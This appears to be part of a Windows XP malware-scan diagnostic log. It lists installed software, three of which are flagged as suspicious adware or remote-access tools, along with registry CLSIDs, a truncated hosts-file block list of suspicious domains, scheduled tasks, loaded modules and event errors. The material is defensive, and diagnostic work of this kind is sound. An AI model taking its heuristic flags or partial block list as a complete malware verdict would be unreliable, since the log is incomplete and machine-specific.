EOS Viewer Utility 1.2.1 (Version: 1.2.1 - Canon) Hidden
Farm Mania (HKLM\...\Farm Mania_is1) (Version:  - )
FileZilla Client 3.1.1.1 (HKCU\...\FileZilla Client) (Version: 3.1.1.1 - )
Frog Frenzy 2 (HKLM\...\{3323D8AC-5821-4A8F-8064-46DE657834CE}) (Version: 2.00.0000 - Cosmi Corporation)
Google Chrome (HKLM\...\Google Chrome) (Version: 36.0.1985.125 - Google Inc.)
Google Earth (HKLM\...\{407B9B5C-DAC5-4F44-A756-B57CAB4E6A8B}) (Version: 4.1.7087.5048 - Google)
Google Toolbar for Internet Explorer (Version: 4.0.0.002 - Google Inc.) Hidden
Google Update Helper (Version: 1.3.24.15 - Google Inc.) Hidden
GPBaseService2 (Version: 140.0.211.000 - Hewlett-Packard) Hidden
High Definition Audio Driver Package - KB888111 (HKLM\...\KB888111WXPSP2) (Version: 20040219.000000 - Microsoft Corporation)
HP Customer Participation Program 14.0 (HKLM\...\HPExtendedCapabilities) (Version: 14.0 - HP)
HP Imaging Device Functions 14.0 (HKLM\...\HP Imaging Device Functions) (Version: 14.0 - HP)
HP Photo Creations (HKLM\...\HP Photo Creations) (Version: 1.0.0.2024 - HP Photo Creations Powered by RocketLife)
HP Photosmart D110 All-In-One Driver Software 14.0 Rel. 7 (HKLM\...\{DBC1DE57-B55A-4D57-9769-1DB9BE506AF7}) (Version: 14.0 - HP)
HP Smart Web Printing 4.60 (HKLM\...\HP Smart Web Printing) (Version: 4.60 - HP)
HP Solution Center 14.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 14.0 - HP)
HP Update (HKLM\...\{97486FBE-A3FC-4783-8D55-EA37E9D171CC}) (Version: 5.005.000.002 - Hewlett-Packard)
HPAppStudio (Version: 140.0.95.000 - Hewlett-Packard) Hidden
HPProductAssistant (Version: 140.0.212.000 - Hewlett-Packard) Hidden
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version:  - )
iTunes (HKLM\...\{0F6F6876-6334-4977-B5DD-CFC12E193420}) (Version: 10.7.0.21 - Apple Inc.)
Java 7 Update 25 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83217025FF}) (Version: 7.0.250 - Oracle)
Java Auto Updater (Version: 2.1.9.5 - Sun Microsystems, Inc.) Hidden
Journey to Stonehenge (HKLM\...\{2AB5A6A3-71C3-49EE-A253-759E01512FF8}) (Version: 2.00.0000 - Cosmi Corporation)
LightScribe  1.4.74.1 (Version: 1.4.74.1 - http://www.lightscribe.com) Hidden
Linkey (HKCU\...\Linkey) (Version: 0.0.0.480 - Aztec Media Inc) <==== ATTENTION
LiveUpdate 3.0 (Symantec Corporation) (HKLM\...\LiveUpdate) (Version: 3.0.0.171 - Symantec Corporation)
Lode Runner 2.0 (HKLM\...\Lode Runner_is1) (Version:  - ZX Games)
Mad About Cats (HKLM\...\Mad About Cats) (Version:  - )
MarketResearch (Version: 140.0.212.000 - Hewlett-Packard) Hidden
Microsoft .NET Framework 1.1 (HKLM\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft .NET Framework 1.1 (Version: 1.1.4322 - Microsoft) Hidden
Microsoft .NET Framework 1.1 Security Update (KB2572067) (HKLM\...\M2572067) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB979906) (HKLM\...\M979906) (Version:  - )
Microsoft .NET Framework 2.0 Service Pack 2 (HKLM\...\{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}) (Version: 2.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 3.0 Service Pack 2 (HKLM\...\{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}) (Version: 3.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft Compression Client Pack 1.0 for Windows XP (HKLM\...\MSCompPackV1) (Version: 1 - Microsoft Corporation)
Microsoft Default Manager (Version: 2.1.54.0 - Microsoft Corporation) Hidden
Microsoft Internationalized Domain Names Mitigation APIs (Version:  - Microsoft Corporation) Hidden
Microsoft National Language Support Downlevel APIs (Version:  - Microsoft Corporation) Hidden
Microsoft Office 2007 Service Pack 2 (SP2) (HKLM\...\{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{0B36C6D6-F5D8-4EAF-BF94-4376A230AD5B}) (Version:  - Microsoft)
Microsoft Office 2007 Service Pack 2 (SP2) (Version:  - Microsoft) Hidden
Microsoft Office Access MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Outlook MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Professional Hybrid 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2007 (Version: 12.0.4518.1014 - Microsoft Corporation) Hidden
Microsoft Office Proofing Tools 2007 Service Pack 2 (SP2) (Version:  - Microsoft) Hidden
Microsoft Office Publisher MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Search Enhancement Pack (Version: 3.0.126.0 - Microsoft Corporation) Hidden
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft Software Update for Web Folders  (English) 12 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft User-Mode Driver Framework Feature Pack 1.0 (HKLM\...\Wudf01000) (Version:  - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Mozilla Firefox 31.0 (x86 en-US) (HKLM\...\Mozilla Firefox 31.0 (x86 en-US)) (Version: 31.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
MSN Toolbar (HKLM\...\{08234a0d-cf39-4dca-99f0-0c5cb496da81}) (Version: 4.0.0357.1 - Microsoft Corporation)
MSN Toolbar Platform (Version: 4.0.0357.1 - Microsoft Corporation) Hidden
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Netflix Movie Viewer (HKLM\...\{BCE72AED-3332-4863-9567-C5DCB9052CA2}) (Version: 1.2.211 - Netflix)
Network (Version: 140.0.215.000 - Hewlett-Packard) Hidden
NTI Backup NOW! 4 (HKLM\...\InstallShield_{385979FE-DC4F-4140-8EAD-A59625000D72}) (Version: 4 - NewTech Infosystems)
NTI Backup NOW! 4 (Version: 4 - NewTech Infosystems) Hidden
NTI CD & DVD-Maker (HKLM\...\InstallShield_{1577A05B-EE62-4BBC-9DB7-FE748FA44EC2}) (Version: 7 - NewTech Infosystems)
NTI CD & DVD-Maker (Version: 7 - NewTech Infosystems) Hidden
OCA Client history tool install (HKLM\...\OcaHistoryUpd) (Version: 8.3.0980 - Microsoft Corporation)
OGA Notifier 2.0.0048.0 (Version: 2.0.0048.0 - Microsoft Corporation) Hidden
Paint.NET v3.36 (HKLM\...\{43602F34-1AA3-44FB-AEB2-D08C2C73743F}) (Version: 3.36.0 - dotPDN LLC)
Pandora (HKLM\...\com.pandora.desktop.E7C14276FFE9EEF0BC7DCE654C467D9A299EFD21.1) (Version: 2.0.8 - PANDORA MEDIA, INC.)
Pandora (Version: 2.0.8 - PANDORA MEDIA, INC.) Hidden
PowerDVD (HKLM\...\{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}) (Version:  - CyberLink Corporation)
PS_AIO_07_D110_SW_Min (Version: 140.0.142.000 - Hewlett-Packard) Hidden
QuickConnect (HKLM\...\{4998FF95-709A-430A-B104-92A009ABB848}) (Version: 3.5 - Qwest)
QuickConnect (Version: 3.5 - Qwest) Hidden
QuickTime (HKLM\...\{AF0CE7C0-A3E4-4D73-988B-B29187EC6E9A}) (Version: 7.73.80.64 - Apple Inc.)
QuickTransfer (Version: 140.0.98.000 - Hewlett-Packard) Hidden
Qwest QuickAssist Desktop Tools (HKLM\...\{A63E18AC-B504-4045-AFE6-A279BBABB988}) (Version: 23 - SupportSoft)
Qwest QuickCare 2.2 (HKLM\...\QwestQuickCare_is1) (Version: 2.2.25.0 - Qwest)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 2.11 - Realtek Semiconductor Corp.)
Remote Desktop Access (VuuPC) (HKLM\...\VOPackage) (Version: 1.0.0.0 - CMI Limited) <==== ATTENTION
Revo Uninstaller 1.93 (HKLM\...\Revo Uninstaller) (Version: 1.93 - VS Revo Group)
ROBLOX Player for Jay (HKCU\...\{373B1718-8CC5-4567-8EE2-9033AD08A680}) (Version:  - ROBLOX Corporation)
Scan (Version: 140.0.80.000 - Hewlett-Packard) Hidden
Settings Manager (HKLM\...\Settings Manager) (Version: 5.0.0.13539 - Aztec Media Inc) <==== ATTENTION
SmartFTP Client 3.0 Setup Files (remove only) (HKLM\...\SmartFTP Client 3.0 Setup Files) (Version: 3.0 - SmartSoft)
SmartWebPrinting (Version: 140.0.186.000 - Hewlett-Packard) Hidden
SolutionCenter (Version: 140.0.214.000 - Hewlett-Packard) Hidden
Spotify (HKCU\...\Spotify) (Version: 0.8.8.347.gbcec6996 - Spotify AB)
Star Wars Galactic Battlegrounds (HKLM\...\{A202BDBA-753F-41B9-B649-CFB0B45FC03E}) (Version:  - )
Starcraft (HKLM\...\Starcraft) (Version:  - )
Status (Version: 140.0.256.000 - Hewlett-Packard) Hidden
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 5.0.1118 - SUPERAntiSpyware.com)
swMSM (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Symantec KB-DocID:2003093015493306 (Version: 1.0.0.1 - Symantec Corporation) Hidden
Toolbox (Version: 140.0.428.000 - Hewlett-Packard) Hidden
TouchCopy (HKLM\...\{91201F55-A6E6-494C-A930-CAFD3C3CD342}) (Version: 4.10 - Wide Angle Software)
TrayApp (Version: 140.0.212.000 - Hewlett-Packard) Hidden
TurboTax 2010 (HKLM\...\TurboTax 2010) (Version:  - Intuit, Inc)
TurboTax 2010 WinPerFedFormset (Version: 010.000.3688 - Intuit Inc.) Hidden
TurboTax 2010 WinPerReleaseEngine (Version: 010.000.0432 - Intuit Inc.) Hidden
TurboTax 2010 WinPerTaxSupport (Version: 010.000.0208 - Intuit Inc.) Hidden
TurboTax 2010 wrapper (Version: 010.000.0157 - Intuit Inc.) Hidden
TurboTax 2010 wutiper (Version: 010.000.1042 - Intuit Inc.) Hidden
TurboTax 2011 (HKLM\...\TurboTax 2011) (Version:  - Intuit, Inc)
TurboTax 2011 WinPerFedFormset (Version: 011.000.2999 - Intuit Inc.) Hidden
TurboTax 2011 WinPerReleaseEngine (Version: 011.000.0474 - Intuit Inc.) Hidden
TurboTax 2011 WinPerTaxSupport (Version: 011.000.0214 - Intuit Inc.) Hidden
TurboTax 2011 wrapper (Version: 011.000.0121 - Intuit Inc.) Hidden
TurboTax 2011 wutiper (Version: 011.000.1401 - Intuit Inc.) Hidden
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (HKLM\...\{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}.KB963707) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2836939v3) (HKLM\...\{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2836939v3) (Version: 3 - Microsoft Corporation)
Update for Microsoft Office 2007 suites (KB2596848) 32-Bit Edition (HKLM\...\{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{8153EC80-C988-4336-8DAF-6D99C0D26E0C}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767916) 32-Bit Edition (HKLM\...\{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{E9A82945-BA29-4EE8-8F2A-2F49545E9CF2}) (Version:  - Microsoft)
Update for Microsoft Office 2007 System (KB2539530) (HKLM\...\{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{0B4CEEAE-AA88-490C-BCB2-AAC3421981A4}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 (KB2687404) 32-Bit Edition (HKLM\...\{90120000-001A-0409-0000-0000000FF1CE}_PROHYBRIDR_{ED38F8A3-4F61-494E-8BCA-E3AC7760C924}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 (KB2687404) 32-Bit Edition (HKLM\...\{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{5DB2894C-2DA4-4DEF-A051-795AE799964A}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 Junk Email Filter (KB2825642) 32-Bit Edition (HKLM\...\{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{9492511E-2CE0-4904-9400-203F44E1DC0D}) (Version:  - Microsoft)
Update for Windows Internet Explorer 7 (KB976749) (HKLM\...\KB976749-IE7) (Version: 1 - Microsoft Corporation)
Update for Windows Internet Explorer 7 (KB980182) (HKLM\...\KB980182-IE7) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2141007) (HKLM\...\KB2141007) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2345886) (HKLM\...\KB2345886) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2467659) (HKLM\...\KB2467659) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2541763) (HKLM\...\KB2541763) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2607712) (HKLM\...\KB2607712) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2616676) (HKLM\...\KB2616676) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2641690) (HKLM\...\KB2641690) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2749655) (HKLM\...\KB2749655) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB951072-v2) (HKLM\...\KB951072-v2) (Version: 2 - Microsoft Corporation)
Update for Windows XP (KB951978) (HKLM\...\KB951978) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB955759) (HKLM\...\KB955759) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB955839) (HKLM\...\KB955839) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB967715) (HKLM\...\KB967715) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB968389) (HKLM\...\KB968389) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB971029) (HKLM\...\KB971029) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB971737) (HKLM\...\KB971737) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB973687) (HKLM\...\KB973687) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB973815) (HKLM\...\KB973815) (Version: 1 - Microsoft Corporation)
URGE (HKLM\...\{8BBF6DFD-0AD9-43A7-9FBD-BF065E3866AF}) (Version: 1.1.9060.0 - MTV Networks)
WebFldrs XP (Version: 9.50.7523 - Microsoft Corporation) Hidden
WebReg (Version: 140.0.212.017 - Hewlett-Packard) Hidden
When Bugs Attack (HKLM\...\{0367BC04-ADEA-47A5-9F82-96C161C99B52}) (Version: 2.00.0000 - Cosmi Corporation)
Windows Genuine Advantage Notifications (KB905474) (HKLM\...\WgaNotify) (Version: 1.8.0031.9 - Microsoft Corporation)
Windows Internet Explorer 7 (HKLM\...\ie7) (Version: 20070813.185237 - Microsoft Corporation)
Windows Live ID Sign-in Assistant (HKLM\...\{0840B4D6-7DD1-4187-8523-E6FC0007EFB7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Media Format 11 runtime (HKLM\...\Windows Media Format Runtime) (Version:  - )
Windows Media Format 11 runtime (Version:  - Microsoft Corporation) Hidden
Windows Media Player 11 (HKLM\...\Windows Media Player) (Version:  - )
Windows Media Player 11 (Version:  - Microsoft Corporation) Hidden
Windows XP Service Pack 3 (HKLM\...\Windows XP Service Pack) (Version: 20080414.031525 - Microsoft Corporation)
WinRAR archiver (HKLM\...\WinRAR archiver) (Version:  - )
WinZip 12.1 (HKLM\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240B8}) (Version: 12.1.8519 - WinZip Computing, S.L. )

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{1796A329-04C1-4C07-B28E-E4A807935C06}\localserver32 -> C:\Program Files\Google\Google Earth\googleearth.exe (Google)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{1A239250-B650-4B63-B4CF-7FCC4DC07DC6}\localserver32 -> C:\Program Files\Google\Google Earth\googleearth.exe (Google)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{1AEDB68D-18A7-4CA9-B41B-3CE7E59FAB24}\localserver32 -> C:\Program Files\Google\Google Earth\googleearth.exe (Google)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{42DF0D46-7D49-4AE5-8EF6-9CA6E41EFEC1}\localserver32 -> C:\Program Files\Google\Google Earth\googleearth.exe (Google)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{63E6BE14-A742-4EEA-8AF3-0EC39F10F850}\localserver32 -> C:\Program Files\Google\Google Earth\googleearth.exe (Google)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{645EEE5A-BD51-4C05-A6AF-6F2CF8950AAB}\localserver32 -> C:\Program Files\Google\Google Earth\googleearth.exe (Google)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{66E8DCC7-97D2-4A89-8E08-D0610FF0878C}\InprocServer32 -> C:\Documents and Settings\Jay\Local Settings\Application Data\Conduit\Community Alerts\Alert.dll No  (the data entry has 4 more characters).
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{76D50904-6780-4c8b-8986-1A7EE0B1716D}\InprocServer32 -> C:\Documents and Settings\Jay\Local Settings\Application Data\RobloxVersions\version-759151294bb84441\RobloxProxy.dll (ROBLOX Corporation)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{77C4C807-E257-43AD-BB3F-7CA88760BD29}\localserver32 -> C:\Program Files\Google\Google Earth\googleearth.exe (Google)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{8097D7E9-DB9E-4AEF-9B28-61D82A1DF784}\localserver32 -> C:\Program Files\Google\Google Earth\googleearth.exe (Google)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{9059C329-4661-49B2-9984-8753C45DB7B9}\localserver32 -> C:\Program Files\Google\Google Earth\googleearth.exe (Google)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{A2D4475B-C9AA-48E2-A029-1DB829DACF7B}\localserver32 -> C:\Program Files\Google\Google Earth\googleearth.exe (Google)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{A4F65992-5738-475B-9C16-CF102BCDE153}\localserver32 -> C:\Program Files\Google\Google Earth\googleearth.exe (Google)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{AFD07A5E-3E20-4D77-825C-2F6D1A50BE5B}\localserver32 -> C:\Program Files\Google\Google Earth\googleearth.exe (Google)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{B153D707-447A-4538-913E-6146B3FDEE02}\localserver32 -> C:\Program Files\Google\Google Earth\googleearth.exe (Google)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{CBD4FB70-F00B-4963-B249-4B056E6A981A}\localserver32 -> C:\Program Files\Google\Google Earth\googleearth.exe (Google)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{D93BF052-FC68-4DB6-A4F8-A4DC9BEEB1C0}\localserver32 -> C:\Program Files\Google\Google Earth\googleearth.exe (Google)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{F4F7B301-7C59-4851-BA97-C51F110B590F}\InprocServer32 -> C:\Program Files\Google\Google Earth\earthps.dll ()

==================== Restore Points  =========================

11-08-2014 01:13:24 System Checkpoint
16-08-2014 03:40:11 System Checkpoint
17-08-2014 20:34:10 System Checkpoint
19-08-2014 03:35:26 Software Distribution Service 3.0
21-08-2014 20:13:15 System Checkpoint

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2004-08-03 23:00 - 2014-08-18 22:44 - 00249174 ____R C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1       localhost
127.0.0.1    www.007guard.com
127.0.0.1    007guard.com
127.0.0.1    008i.com
127.0.0.1    www.008k.com
127.0.0.1    008k.com
127.0.0.1    www.00hq.com
127.0.0.1    00hq.com
127.0.0.1    010402.com
127.0.0.1    www.032439.com
127.0.0.1    032439.com
127.0.0.1    www.1001-search.info
127.0.0.1    1001-search.info
127.0.0.1    www.100888290cs.com
127.0.0.1    100888290cs.com
127.0.0.1    www.100sexlinks.com
127.0.0.1    100sexlinks.com
127.0.0.1    www.10sek.com
127.0.0.1    10sek.com
127.0.0.1    www.123topsearch.com
127.0.0.1    123topsearch.com
127.0.0.1    www.132.com
127.0.0.1    132.com
127.0.0.1    www.136136.net
127.0.0.1    136136.net
127.0.0.1    www.139mm.com
127.0.0.1    139mm.com
127.0.0.1    www.163ns.com
127.0.0.1    163ns.com

There are 1000 more lines.


==================== Scheduled Tasks (whitelisted) =============


(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\AppleSoftwareUpdate.job => C:\Program Files\Apple Software Update\SoftwareUpdate.exe
Task: C:\WINDOWS\Tasks\avast! Emergency Update.job => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2014-08-10 18:58 - 2014-07-28 04:27 - 00488464 _____ () c:\program files\settings manager\smdmf\sysapcrt.dll
2013-08-25 10:28 - 2013-08-25 00:09 - 02095616 _____ () C:\Program Files\AVAST Software\Avast\defs\13082500\algo.dll
2011-09-05 22:24 - 2013-06-11 10:11 - 00240448 ____N () C:\Program Files\AVAST Software\Avast\Setup\SetIFace.dll
2011-09-27 08:23 - 2011-09-27 08:23 - 00087912 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2011-09-27 08:22 - 2011-09-27 08:22 - 01242472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2008-08-11 08:48 - 2008-08-11 08:48 - 00094720 _____ () C:\Program Files\FileZilla FTP Client\fzshellext.dll
2009-10-23 18:39 - 2009-08-16 17:06 - 00141312 _____ () C:\Program Files\WinRAR\rarext.dll
2007-04-24 20:58 - 2007-04-29 20:49 - 00043520 _____ () C:\WINDOWS\system32\CmdLineExt03.dll
2007-04-18 17:14 - 2006-05-19 17:09 - 00352256 _____ () C:\Acer\Empowering Technology\eRecovery\it41.dll
2007-04-18 17:14 - 2006-01-12 10:33 - 00212992 _____ () C:\Acer\Empowering Technology\eRecovery\imagefile.dll
2014-08-10 18:58 - 2014-07-28 04:27 - 00019472 _____ () c:\program files\settings manager\smdmf\smdmfldr.dll
2005-09-21 22:39 - 2005-09-21 22:39 - 00212992 _____ () C:\Program Files\Acer WLAN 11g USB Dongle\dot1x_dll.dll
2004-03-05 16:00 - 2004-03-05 16:00 - 00155648 _____ () C:\Program Files\Acer WLAN 11g USB Dongle\SSLEAY32.dll
2004-03-05 16:00 - 2004-03-05 16:00 - 00827392 _____ () C:\Program Files\Acer WLAN 11g USB Dongle\LIBEAY32.dll
2005-11-01 18:36 - 2005-11-01 18:36 - 00045056 _____ () C:\Program Files\Acer WLAN 11g USB Dongle\ZDWLAN.dll
2014-08-10 14:28 - 2014-08-10 14:29 - 03800688 _____ () C:\Program Files\Mozilla Firefox\mozjs.dll
2014-07-09 08:01 - 2014-07-09 08:01 - 17029808 _____ () C:\WINDOWS\system32\Macromed\Flash\NPSWF32_14_0_0_145.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)


==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)


==================== Faulty Device Manager Devices =============

Name: Photosmart D110 series
Description: Photosmart D110 series
Class Guid: {4D36E971-E325-11CE-BFC1-08002BE10318}
Manufacturer: HP
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Event log errors: =========================

Application errors:
==================
Error: (08/21/2014 09:22:50 PM) (Source: PerfNet) (EventID: 2002) (User: )
Description: Unable to open the Redirector service. Redirector performance data
will not be returned. Error code returned is in data DWORD 0.

Error: (08/21/2014 09:14:04 PM) (Source: PerfNet) (EventID: 2002) (User: )
Description: Unable to open the Redirector service. Redirector performance data
will not be returned. Error code returned is in data DWORD 0.

Error: (08/21/2014 00:28:00 PM) (Source: .NET Runtime Optimization Service) (EventID: 1103) (User: )
Description: .NET Runtime Optimization Service (clr_optimization_v2.0.50727_32) - Tried to start a service that wasn't the latest version of CLR Optimization service. Will shutdown

Error: (08/21/2014 00:26:22 PM) (Source: PerfNet) (EventID: 2002) (User: )
Description: Unable to open the Redirector service. Redirector performance data
will not be returned. Error code returned is in data DWORD 0.

Error: (08/18/2014 10:53:05 PM) (Source: LoadPerf) (EventID: 3011) (User: )
Description: Unloading the performance counter strings for service ASP.NET (ASP.NET) failed. The
Error code is the first DWORD in Data section.

Error: (08/18/2014 10:53:05 PM) (Source: LoadPerf) (EventID: 3012) (User: )
Description: The performance strings in the Performance registry value is corrupted when
process Performance extension counter provider. BaseIndex value from Performance
registry is the first DWORD in Data section, LastCounter value is the second
DWORD in Data section, and LastHelp value is the third DWORD in Data section.

Error: (08/18/2014 10:53:03 PM) (Source: LoadPerf) (EventID: 3011) (User: )
Description: Unloading the performance counter strings for service aspnet_state (ASP.NET State Service) failed. The
Error code is the first DWORD in Data section.

Error: (08/18/2014 10:53:03 PM) (Source: LoadPerf) (EventID: 3012) (User: )
Description: The performance strings in the Performance registry value is corrupted when
process Performance extension counter provider. BaseIndex value from Performance
registry is the first DWORD in Data section, LastCounter value is the second
DWORD in Data section, and LastHelp value is the third DWORD in Data section.

Error: (08/18/2014 10:53:01 PM) (Source: LoadPerf) (EventID: 3011) (User: )
Description: Unloading the performance counter strings for service ASP.NET_2.0.50727 (ASP.NET_2.0.50727) failed. The
Error code is the first DWORD in Data section.

